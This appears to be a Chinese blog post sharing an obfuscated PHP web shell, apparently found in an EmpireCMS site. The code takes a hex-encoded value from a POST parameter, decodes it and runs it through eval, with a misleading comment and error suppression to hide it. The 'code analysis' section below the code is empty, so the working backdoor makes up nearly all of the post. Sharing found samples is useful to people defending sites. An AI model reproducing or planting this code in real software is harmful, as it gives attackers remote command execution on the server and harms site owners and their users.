首页 > 其他 > 网站日记>正文

隐藏的好深,这个代码

提示: 阅读权限:公开  
<?php
class _{
        static public $phpcms=Null;
        function __construct($l="error"){
	self::$phpcms=$l;
	@eval/*Defining error level offences*/(null.null.self::$phpcms);
	}}
        function hexToStr($hex){ 
        $str=""; 
        for($i=0;$i<strlen($hex)-1;$i+=2)
        $str.=chr(hexdec($hex[$i].$hex[$i+1]));
        return  $str;
    } 
$error = null.hexToStr(@$_POST/**/["123"]);
$d = new _($error);
if(!defined('InEmpireCMS'))
{
	exit();
}
?>

 代码分析:

上一篇:帝国cms会员前台操作交互方案,ajax,不跳转提交

下一篇:nginx下的伪静态规则中使用花括号量词

tags:

返回首页

相关

热门

站内直通车

[!--temp.bottomnav--]
返回顶部